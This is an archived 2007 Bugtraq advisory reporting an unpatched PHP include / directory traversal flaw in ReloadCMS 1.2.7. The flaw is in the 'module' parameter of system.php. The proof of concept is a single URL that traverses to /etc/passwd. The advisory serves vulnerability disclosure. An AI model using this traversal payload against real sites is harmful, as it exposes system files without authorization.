| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20071020142720.655.qmail@securityfocus.com>
Date: 20 Oct 2007 14:27:20 -0000
From: sekuru@...il.ua
To: bugtraq@...urityfocus.com
Subject: ReloadCMS Vulnerable
New Advisory:
ReloadCMS
http://reloadcms.com
——————–Summary—————-
Software: ReloadCMS
Sowtware’s Web Site: http://reloadcms.com/main/
Versions: 1.2.7
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched
PoC/Exploit: Available
Solution: Not Available
Discovered by: http://reloadcms.com
Php include bug
—————–Description—————
vulnerable mosule system.php, parameter GET['module'] is not properly filtered
————–PoC/Exploit———————-
http://site.url/index.php?module=../../../../etc/passwd
————–Solution———————
No Patch available.
————–Credit———————–
Discovered by: http://reloadcms.com